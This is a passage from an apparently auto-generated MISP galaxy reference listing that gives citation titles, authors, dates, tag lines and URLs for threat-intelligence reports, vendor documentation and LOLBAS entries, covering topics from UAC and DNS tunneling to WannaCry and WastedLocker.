The tag is: misp-galaxy:references="Chrome Roaming Profiles"

Table 15956. Table References

Links

https://support.google.com/chrome/a/answer/7349337

Ars Technica GRU indictment Jul 2018

Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="Ars Technica GRU indictment Jul 2018"

Table 15957. Table References

Links

https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/

Remote Management MDM macOS

Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Remote Management MDM macOS"

Table 15958. Table References

Links

https://support.apple.com/en-us/HT209161

Securelist Denis April 2017

Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Securelist Denis April 2017"

Table 15959. Table References

Links

https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/

Microsoft UAC

Microsoft. (n.d.). User Account Control. Retrieved January 18, 2018.

The tag is: misp-galaxy:references="Microsoft UAC"

Table 15960. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx

TechNet Inside UAC

Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.

The tag is: misp-galaxy:references="TechNet Inside UAC"

Table 15961. Table References

Links

https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx

User Approved Kernel Extension Pike’s

Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="User Approved Kernel Extension Pike’s"

Table 15962. Table References

Links

https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/

Adlice Software IAT Hooks Oct 2014

Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Adlice Software IAT Hooks Oct 2014"

Table 15963. Table References

Links

https://www.adlice.com/userland-rootkits-part-1-iat-hooks/

cisco_username_cmd

Cisco. (2023, March 6). username - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="cisco_username_cmd"

Table 15964. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630

Jamf User Password Policies

Holland, J. (2016, January 25). User password policies on non AD machines. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="Jamf User Password Policies"

Table 15965. Table References

Links

https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines

MacOS Email Rules

Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.

The tag is: misp-galaxy:references="MacOS Email Rules"

Table 15966. Table References

Links

https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac

Kickstart Apple Remote Desktop commands

Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Kickstart Apple Remote Desktop commands"

Table 15967. Table References

Links

https://support.apple.com/en-us/HT201710

Microsoft Windows Event Forwarding FEB 2018

Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Microsoft Windows Event Forwarding FEB 2018"

Table 15968. Table References

Links

https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection

Apple ZShell

Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.

The tag is: misp-galaxy:references="Apple ZShell"

Table 15969. Table References

Links

https://support.apple.com/HT208050

Kuberentes ABAC

Kuberenets. (n.d.). Using ABAC Authorization. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Kuberentes ABAC"

Table 15970. Table References

Links

https://kubernetes.io/docs/reference/access-authn-authz/abac/

Cisco Umbrella DGA Brute Force

Kasza, A. (2015, February 18). Using Algorithms to Brute Force Algorithms. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Cisco Umbrella DGA Brute Force"

Table 15971. Table References

Links

https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/

Exploit Monday Mitigate Device Guard Bypases

Graeber, M. (2016, September 8). Using Device Guard to Mitigate Against Device Guard Bypasses. Retrieved September 13, 2016.

The tag is: misp-galaxy:references="Exploit Monday Mitigate Device Guard Bypases"

Table 15972. Table References

Links

http://www.exploit-monday.com/2016/09/using-device-guard-to-mitigate-against.html

Microsoft DsAddSidHistory

Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft DsAddSidHistory"

Table 15973. Table References

Links

https://msdn.microsoft.com/library/ms677982.aspx

Microsoft 365 Defender Solorigate

Microsoft 365 Defender Team. (2020, December 28). Using Microsoft 365 Defender to protect against Solorigate. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="Microsoft 365 Defender Solorigate"

Table 15974. Table References

Links

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

TechNet Netsh

Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.

The tag is: misp-galaxy:references="TechNet Netsh"

Table 15975. Table References

Links

https://technet.microsoft.com/library/bb490939.aspx

Demaske Netsh Persistence

Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.

The tag is: misp-galaxy:references="Demaske Netsh Persistence"

Table 15976. Table References

Links

https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html

CrowdStrike Outlook Forms

Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.

The tag is: misp-galaxy:references="CrowdStrike Outlook Forms"

Table 15977. Table References

Links

https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746

Red Hat PAM

Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Red Hat PAM"

Table 15978. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules

Varonis Power Automate Data Exfiltration

Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Varonis Power Automate Data Exfiltration"

Table 15979. Table References

Links

https://www.varonis.com/blog/power-automate-data-exfiltration

Microsoft Disable NTLM Nov 2012

Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft Disable NTLM Nov 2012"

Table 15980. Table References

Links

https://technet.microsoft.com/library/jj865668.aspx

Microsoft SMB Packet Signing

Microsoft. (2008, September 10). Using SMB Packet Signing. Retrieved February 7, 2019.

The tag is: misp-galaxy:references="Microsoft SMB Packet Signing"

Table 15981. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)

TechNet Applocker vs SRP

Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.

The tag is: misp-galaxy:references="TechNet Applocker vs SRP"

Table 15982. Table References

Links

https://technet.microsoft.com/en-us/library/ee791851.aspx

Microsoft Using Software Restriction

Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.

The tag is: misp-galaxy:references="Microsoft Using Software Restriction"

Table 15983. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/ee791851(v=ws.11)?redirectedfrom=MSDN

OSX Keychain Schaumann

Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="OSX Keychain Schaumann"

Table 15984. Table References

Links

https://www.netmeister.org/blog/keychain-passwords.html

USNYAG IranianBotnet March 2016

Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.

The tag is: misp-galaxy:references="USNYAG IranianBotnet March 2016"

Table 15985. Table References

Links

https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged

UtilityFunctions.ps1 - LOLBAS Project

LOLBAS. (2021, September 26). UtilityFunctions.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="UtilityFunctions.ps1 - LOLBAS Project"

Table 15986. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/

Kernel.org Restrict Kernel Module

Vander Stoep, J. (2016, April 5). [v3] selinux: restrict kernel module loadinglogin register. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Kernel.org Restrict Kernel Module"

Table 15987. Table References

Links

https://patchwork.kernel.org/patch/8754821/

SentinelOne Valak June 2020

Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020.

The tag is: misp-galaxy:references="SentinelOne Valak June 2020"

Table 15988. Table References

Links

https://assets.sentinelone.com/labs/sentinel-one-valak-i

Cybereason Valak May 2020

Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.

The tag is: misp-galaxy:references="Cybereason Valak May 2020"

Table 15989. Table References

Links

https://www.cybereason.com/blog/valak-more-than-meets-the-eye

Walmart Roberts Oct 2018

Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping — Advanced Maldoc Techniques. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="Walmart Roberts Oct 2018"

Table 15990. Table References

Links

https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278

vbc.exe - LOLBAS Project

LOLBAS. (2020, February 27). vbc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="vbc.exe - LOLBAS Project"

Table 15991. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Vbc/

Veil_Ref

Veil Framework. (n.d.). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Veil_Ref"

Table 15992. Table References

Links

https://www.veil-framework.com/framework/

LOLBAS Verclsid

LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="LOLBAS Verclsid"

Table 15993. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Verclsid/

WinOSBite verclsid.exe

verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020.

The tag is: misp-galaxy:references="WinOSBite verclsid.exe"

Table 15994. Table References

Links

https://www.winosbite.com/verclsid-exe/

Unit 42 VERMIN Jan 2018

Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.

The tag is: misp-galaxy:references="Unit 42 VERMIN Jan 2018"

Table 15995. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/

Unit 42 Vice Society December 6 2022

JR Gumarin. (2022, December 6). Vice Society: Profiling a Persistent Threat to the Education Sector. Retrieved November 14, 2023.

The tag is: misp-galaxy:references="Unit 42 Vice Society December 6 2022"

Table 15996. Table References

Links

https://unit42.paloaltonetworks.com/vice-society-targets-education-sector/

Minerva Labs Vidar Stealer Evasion

Minerva Labs. (2021, September 23). Vidar Stealer Evasion Arsenal. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="Minerva Labs Vidar Stealer Evasion"

Table 15997. Table References

Links

https://web.archive.org/web/20221201005558/https://minerva-labs.com/blog/vidar-stealer-evasion-arsenal/

Amnesty Intl. Ocean Lotus February 2021

Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.

The tag is: misp-galaxy:references="Amnesty Intl. Ocean Lotus February 2021"

Table 15998. Table References

Links

https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf

FireEye APT32 April 2020

Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020.

The tag is: misp-galaxy:references="FireEye APT32 April 2020"

Table 15999. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html

Slack Help Center Access Logs

Slack Help Center. (n.d.). View Access Logs for your workspace. Retrieved April 10, 2023.

The tag is: misp-galaxy:references="Slack Help Center Access Logs"

Table 16000. Table References

Links

https://slack.com/help/articles/360002084807-View-Access-Logs-for-your-workspace

Azure Activity Logs

Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="Azure Activity Logs"

Table 16001. Table References

Links

https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs

DOJ GRU Indictment Jul 2018

Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="DOJ GRU Indictment Jul 2018"

Table 16002. Table References

Links

https://www.justice.gov/file/1080281/download

MalwareTech VFS Nov 2014

Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.

The tag is: misp-galaxy:references="MalwareTech VFS Nov 2014"

Table 16003. Table References

Links

https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html

Ars Technica Pwn2Own 2017 VM Escape

Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.

The tag is: misp-galaxy:references="Ars Technica Pwn2Own 2017 VM Escape"

Table 16004. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

Google VM

Google. (n.d.). Virtual machine instances. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Google VM"

Table 16005. Table References

Links

https://cloud.google.com/compute/docs/instances

Microsoft Virutal Machine API

Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Microsoft Virutal Machine API"

Table 16006. Table References

Links

https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get

Azure Update Virtual Machines

Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Azure Update Virtual Machines"

Table 16007. Table References

Links

https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update

Azure Virtual Network TAP

Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="Azure Virtual Network TAP"

Table 16008. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview

Google VPC Overview

Google. (2019, September 23). Virtual Private Cloud (VPC) network overview. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Google VPC Overview"

Table 16009. Table References

Links

https://cloud.google.com/vpc/docs/vpc

Volexity Virtual Private Keylogging

Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.

The tag is: misp-galaxy:references="Volexity Virtual Private Keylogging"

Table 16010. Table References

Links

https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/

VirusTotal Behavior def.exe

VirusTotal. (2023, July 11). VirusTotal Behavior def.exe. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="VirusTotal Behavior def.exe"

Table 16011. Table References

Links

https://www.virustotal.com/gui/file/7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893/behavior

VirusTotal FAQ

VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.

The tag is: misp-galaxy:references="VirusTotal FAQ"

Table 16012. Table References

Links

https://www.virustotal.com/en/faq/

Visa RawPOS March 2015

Visa. (2015, March). Visa Security Alert: "RawPOS" Malware Targeting Lodging Merchants. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="Visa RawPOS March 2015"

Table 16013. Table References

Links

https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf

ESET Recon Snake Nest

Boutin, J. and Faou, M. (2018). Visiting the snake nest. Retrieved May 7, 2019.

The tag is: misp-galaxy:references="ESET Recon Snake Nest"

Table 16014. Table References

Links

https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Visiting-The-Snake-Nest.pdf

VB Microsoft

Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="VB Microsoft"

Table 16015. Table References

Links

https://docs.microsoft.com/dotnet/visual-basic/

Wikipedia VBA

Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.

The tag is: misp-galaxy:references="Wikipedia VBA"

Table 16016. Table References

Links

https://en.wikipedia.org/wiki/Visual_Basic_for_Applications

VB .NET Mar 2020

NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="VB .NET Mar 2020"

Table 16017. Table References

Links

https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/

VisualUiaVerifyNative.exe - LOLBAS Project

LOLBAS. (2021, September 26). VisualUiaVerifyNative.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="VisualUiaVerifyNative.exe - LOLBAS Project"

Table 16018. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/

Carbon Black HotCroissant April 2020

Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.

The tag is: misp-galaxy:references="Carbon Black HotCroissant April 2020"

Table 16019. Table References

Links

https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

Offensive Security VNC Authentication Check

Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Offensive Security VNC Authentication Check"

Table 16020. Table References

Links

https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/

CheckPoint Volatile Cedar March 2015

Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.

The tag is: misp-galaxy:references="CheckPoint Volatile Cedar March 2015"

Table 16021. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

Microsoft Volt Typhoon May 2023

Microsoft Threat Intelligence. (2023, May 24). Volt Typhoon targets US critical infrastructure with living-off-the-land techniques. Retrieved July 27, 2023.

The tag is: misp-galaxy:references="Microsoft Volt Typhoon May 2023"

Table 16022. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

VSDiagnostics.exe - LOLBAS Project

LOLBAS. (2023, July 12). VSDiagnostics.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="VSDiagnostics.exe - LOLBAS Project"

Table 16023. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/

Vshadow.exe - LOLBAS Project

LOLBAS. (2023, September 6). Vshadow.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Vshadow.exe - LOLBAS Project"

Table 16024. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/

VSIISExeLauncher.exe - LOLBAS Project

LOLBAS. (2021, September 24). VSIISExeLauncher.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="VSIISExeLauncher.exe - LOLBAS Project"

Table 16025. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/

vsjitdebugger.exe - LOLBAS Project

LOLBAS. (2018, May 25). vsjitdebugger.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="vsjitdebugger.exe - LOLBAS Project"

Table 16026. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/

vsls-agent.exe - LOLBAS Project

LOLBAS. (2022, November 1). vsls-agent.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="vsls-agent.exe - LOLBAS Project"

Table 16027. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/

vstest.console.exe - LOLBAS Project

LOLBAS. (2023, September 8). vstest.console.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="vstest.console.exe - LOLBAS Project"

Table 16028. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/

Vulnerability and Exploit Detector

Kanthak, S.. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.

The tag is: misp-galaxy:references="Vulnerability and Exploit Detector"

Table 16029. Table References

Links

https://skanthak.homepage.t-online.de/sentinel.html

Kanthak Sentinel

Kanthak, S. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.

The tag is: misp-galaxy:references="Kanthak Sentinel"

Table 16030. Table References

Links

https://skanthak.homepage.t-online.de/sentinel.html

Technet MS14-068

Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Technet MS14-068"

Table 16031. Table References

Links

https://technet.microsoft.com/en-us/library/security/ms14-068.aspx

vxunderground debug

vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="vxunderground debug"

Table 16032. Table References

Links

https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug

Symantec W32.Duqu

Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.

The tag is: misp-galaxy:references="Symantec W32.Duqu"

Table 16033. Table References

Links

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Symantec W.32 Stuxnet Dossier

Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.

The tag is: misp-galaxy:references="Symantec W.32 Stuxnet Dossier"

Table 16034. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

w32.tidserv.g

Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="w32.tidserv.g"

Table 16035. Table References

Links

https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2

Github W32Time Oct 2017

Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.

The tag is: misp-galaxy:references="Github W32Time Oct 2017"

Table 16036. Table References

Links

https://github.com/scottlundgren/w32time

Symantec Chernobyl W95.CIH

Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.

The tag is: misp-galaxy:references="Symantec Chernobyl W95.CIH"

Table 16037. Table References

Links

https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99

Wab.exe - LOLBAS Project

LOLBAS. (2018, May 25). Wab.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wab.exe - LOLBAS Project"

Table 16038. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wab/

GitLab WakeOnLAN

Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021.

The tag is: misp-galaxy:references="GitLab WakeOnLAN"

Table 16039. Table References

Links

https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN

FireEye WannaCry 2017

Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="FireEye WannaCry 2017"

Table 16040. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

BfV North Korea February 17 2024

Bundesamt fur Verfassungsschutz. (2024, February 17). Warning of North Korean cyber threats targeting the Defense Sector. Retrieved February 26, 2024.

The tag is: misp-galaxy:references="BfV North Korea February 17 2024"

Table 16041. Table References

Links

https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?blob=publicationFile&v=2

Trend Micro War of Crypto Miners

Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency Miners: A Battle for Resources. Retrieved April 6, 2021.

The tag is: misp-galaxy:references="Trend Micro War of Crypto Miners"

Table 16042. Table References

Links

https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html

Check Point Warzone Feb 2020

Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021.

The tag is: misp-galaxy:references="Check Point Warzone Feb 2020"

Table 16043. Table References

Links

https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

Uptycs Warzone UAC Bypass November 2020

Mohanta, A. (2020, November 25). Warzone RAT comes with UAC bypass technique. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="Uptycs Warzone UAC Bypass November 2020"

Table 16044. Table References

Links

https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique

Dragos WASSONITE

Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="Dragos WASSONITE"

Table 16045. Table References

Links

https://www.dragos.com/threat/wassonite/

NCC Group WastedLocker June 2020

Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="NCC Group WastedLocker June 2020"

Table 16046. Table References

Links

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

Sentinel Labs WastedLocker July 2020

Walter, J.. (2020, July 23). WastedLocker Ransomware: Abusing ADS and NTFS File Attributes. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="Sentinel Labs WastedLocker July 2020"

Table 16047. Table References

Links

https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/

Intezer Doki July 20

Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Intezer Doki July 20"

Table 16048. Table References

Links

https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/

Trend Micro Waterbear December 2019

Su, V. et al. (2019, December 11). Waterbear Returns, Uses API Hooking to Evade Security. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Trend Micro Waterbear December 2019"

Table 16049. Table References

Links

https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html

Symantec Waterbug Jun 2019

Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="Symantec Waterbug Jun 2019"

Table 16050. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments

ESET DazzleSpy Jan 2022

M.Léveillé, M., Cherepanov, A.. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.

The tag is: misp-galaxy:references="ESET DazzleSpy Jan 2022"

Table 16051. Table References

Links

https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/

win_wbadmin_delete_catalog

Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="win_wbadmin_delete_catalog"

Table 16052. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog

SecureWorks WannaCry Analysis

Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.

The tag is: misp-galaxy:references="SecureWorks WannaCry Analysis"

Table 16053. Table References

Links

https://www.secureworks.com/research/wcry-ransomware-analysis

Aleks Weapons Nov 2015

Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="Aleks Weapons Nov 2015"

Table 16054. Table References

Links

https://www.youtube.com/watch?v=lDvf4ScWbcQ

NIST Web Bug

NIST Information Technology Laboratory. (n.d.). web bug. Retrieved March 22, 2023.

The tag is: misp-galaxy:references="NIST Web Bug"

Table 16055. Table References

Links

https://csrc.nist.gov/glossary/term/web_bug

Didier Stevens WebDAV Traffic

Stevens, D. (2017, November 13). WebDAV Traffic To Malicious Sites. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Didier Stevens WebDAV Traffic"

Table 16056. Table References

Links

https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/

Checkmarx Webhooks

Jossef Harush Kadouri. (2022, March 7). Webhook Party — Malicious packages caught exfiltrating data via legit webhook services. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="Checkmarx Webhooks"

Table 16057. Table References

Links

https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191

Push Security SaaS Attacks Repository Webhooks

Push Security. (2023, July 31). Webhooks. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Push Security SaaS Attacks Repository Webhooks"

Table 16058. Table References

Links

https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md

acunetix Server Secuirty

Acunetix. (n.d.). Web Server Security and Database Server Security. Retrieved July 26, 2018.

